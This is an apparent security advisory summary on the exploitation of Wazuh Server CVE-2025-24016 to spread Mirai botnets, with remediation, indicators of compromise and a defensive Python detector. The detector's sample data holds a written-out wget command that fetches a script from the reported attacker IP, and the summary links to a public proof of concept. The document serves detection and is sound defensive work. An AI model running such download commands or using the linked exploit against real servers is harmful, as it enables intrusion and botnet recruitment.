Full Report
A now-patched critical security flaw in the Wazuh Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks. Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that
Analysis Summary
# Vulnerability: Critical Unsafe Deserialization RCE in Wazuh Server
## CVE Details
- CVE ID: CVE-2025-24016
- CVSS Score: 9.9 (Critical)
- CWE: Unsafe Deserialization
## Affected Systems
- Products: Wazuh Server
- Versions: Wazuh Server 4.4.0 and later.
- Configurations: N/A (Affects API deserialization process)
## Vulnerability Description
This vulnerability is an unsafe deserialization flaw in the Wazuh API. Parameters passed through the `DistributedAPI` are serialized as JSON and later deserialized by the `as_wazuh_object` function in `framework/wazuh/core/cluster/common.py`. A remote threat actor who can reach the API can supply a crafted JSON payload that, on deserialization, executes arbitrary Python code on the underlying Wazuh server (remote code execution, RCE).
## Exploitation
- Status: Exploited in the wild
- Complexity: Low (a public PoC is available and the flaw yields direct RCE)
- Attack Vector: Network
## Impact
- Confidentiality: High (RCE allows full system compromise)
- Integrity: High (RCE allows arbitrary code execution)
- Availability: High (Exploited to deploy Mirai botnet components)
## Remediation
### Patches
- Wazuh Server version 4.9.1 (Released February 2025)
### Workarounds
- No vendor workaround was published; immediate patching is advised because the flaw is under active exploitation. Perimeter controls (e.g., WAF rules) that inspect incoming API traffic for suspicious JSON structures may offer temporary relief but are not a substitute for the patch.
## Detection
- Indicators of compromise include shell script execution originating from the Wazuh server process that attempts to download files (specifically Mirai botnet variants such as LZRD or Resbot) from known attacker IPs (e.g., 176.65.134[.]62).
- Detection should focus on monitoring the API endpoints for JSON payloads of unusual size or structure, and on monitoring the Wazuh server process for unauthorized outbound connections, shell script execution, or the presence of known Mirai binaries.
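As an added illustration of the second detection bullet (example code written for this summary, not code from the report, from Akamai or from Wazuh), the following Python flags process-creation events in which the Wazuh API process spawns a shell or download tool that reaches an external host. The JSON event format, the sample lines and the process name `wazuh-apid` are assumptions; only the attacker IP comes from the report.

```python
import ipaddress, json, re
from typing import Iterable, List, Optional, Tuple

# Assumption: the Wazuh API daemon runs under this process name.
WAZUH_API_PROCESSES = {"wazuh-apid"}
SHELLS = {"sh", "bash", "dash"}
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp)\b")
URL_HOST = re.compile(r"(?:https?|ftp)://([0-9A-Za-z.\-]+)")
# Attacker IP quoted (defanged) in the report's Detection section.
KNOWN_BAD_IPS = {"176.65.134.62"}

def is_external(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True  # not an IP literal, so a DNS name: treat as external

def classify(event: dict) -> Optional[str]:
    """Label a child process of the Wazuh API, or None if not flagged."""
    if event.get("parent_name") not in WAZUH_API_PROCESSES:
        return None
    cmd = event.get("cmdline", "")
    if event.get("name") not in SHELLS and not FETCH_TOOLS.search(cmd):
        return None  # other helpers started by the API are not flagged
    hosts = URL_HOST.findall(cmd)
    if any(h in KNOWN_BAD_IPS for h in hosts):
        return "ioc-download"       # reaches a known attacker IP
    if any(is_external(h) for h in hosts):
        return "external-download"  # fetch from outside the network
    return "spawn-from-api"         # shell or fetch tool, no external host

def scan(lines: Iterable[str]) -> List[Tuple[int, str]]:
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip rather than abort the scan
        label = classify(event)
        if label is not None:
            findings.append((event["pid"], label))
    return findings

# Constructed sample events (not real telemetry) in the assumed format.
SAMPLE_EVENTS = [
    '{"pid": 1201, "name": "sh", "parent_name": "wazuh-apid", "cmdline": "sh -c wget http://176.65.134.62/x.sh -O /tmp/x.sh"}',
    '{"pid": 1202, "name": "curl", "parent_name": "wazuh-apid", "cmdline": "curl http://10.0.0.5/health"}',
    '{"pid": 1203, "name": "bash", "parent_name": "sshd", "cmdline": "bash -l"}',
    '{"pid": 1204, "name": "python3", "parent_name": "wazuh-apid", "cmdline": "python3 -m wazuh"}',
]
```

Tune `WAZUH_API_PROCESSES` and `SHELLS` to the baseline of the deployment being monitored; the `spawn-from-api` label is the lowest-confidence signal and will need local allow-listing.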
## References
- Vendor Advisory (Wazuh): hxxps://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
- Public PoC: hxxps://github.com/MuhammadWaseem29/CVE-2025-24016
- Akamai Report: hxxps://www.akamai.com/blog/security-research/botnets-flaw-mirai-spreads-through-wazuh-vulnerability